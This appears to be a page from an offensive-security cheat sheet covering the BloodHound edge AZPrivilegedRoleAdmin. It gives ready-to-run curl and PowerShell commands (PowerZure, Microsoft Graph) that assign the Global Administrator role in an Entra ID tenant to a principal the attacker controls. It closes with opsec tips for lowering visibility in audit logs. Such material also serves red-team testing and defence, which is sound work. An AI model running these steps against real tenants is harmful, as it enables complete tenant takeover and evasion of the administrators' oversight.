🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / AZPrivilegedRoleAdmin

AZPrivilegedRoleAdmin

The source principal holds the Privileged Role Administrator role, allowing it to assign any Entra ID admin role to any principal β€” including Global Administrator.

Applies to: User / ServicePrincipal β†’ AZTenant

Linux Abuse

Assign Global Admin role to controlled principal (curl)

TOKEN=$(curl -s -X POST \
  "https://login.microsoftonline.com/<tenant-id>/oauth2/v2.0/token" \
  -d "client_id=<app-id>&client_secret=<secret>&scope=https://graph.microsoft.com/.default&grant_type=client_credentials" \
  | jq -r '.access_token')

# Get Global Administrator role object ID
curl -s "https://graph.microsoft.com/v1.0/directoryRoles?\$filter=displayName eq 'Global Administrator'" \
  -H "Authorization: Bearer $TOKEN" | jq '.value[0].id'

# Assign role
curl -s -X POST "https://graph.microsoft.com/v1.0/directoryRoles/<role-id>/members/\$ref" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d "{\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/<object-id>\"}"

Assign via roleManagement endpoint (unified RBAC)

curl -s -X POST "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{
    "principalId": "<object-id>",
    "roleDefinitionId": "62e90394-69f5-4237-9190-012177145e10",
    "directoryScopeId": "/"
  }'

Windows Abuse

PowerZure β€” assign admin role

Connect-AzAccount -AccessToken <access-token> -AccountId <username>
Add-AzureADRole -Role 'Global Administrator' -PrincipalId <object-id>

Microsoft.Graph PowerShell

Connect-MgGraph -AccessToken <access-token>

# Ensure Global Administrator role is activated in tenant
$role = Get-MgDirectoryRole -Filter "displayName eq 'Global Administrator'"
# If not activated yet:
$roleTemplate = Get-MgDirectoryRoleTemplate -Filter "displayName eq 'Global Administrator'"
$role = New-MgDirectoryRole -RoleTemplateId $roleTemplate.Id

New-MgDirectoryRoleMember -DirectoryRoleId $role.Id -DirectoryObjectId <object-id>

Assign via Graph role assignments

$params = @{
  principalId      = "<object-id>"
  roleDefinitionId = "62e90394-69f5-4237-9190-012177145e10"  # Global Administrator
  directoryScopeId = "/"
}
New-MgRoleManagementDirectoryRoleAssignment @params

Opsec

  • Role assignments are logged in Entra ID audit as "Add member to role" with actor, role, and target.
  • Activating the Global Administrator role for a service principal is lower-visibility than adding an interactive user.
  • Global Admin role definition ID (static): 62e90394-69f5-4237-9190-012177145e10.
  • After escalation to Global Admin, follow AZGlobalAdmin abuse chain.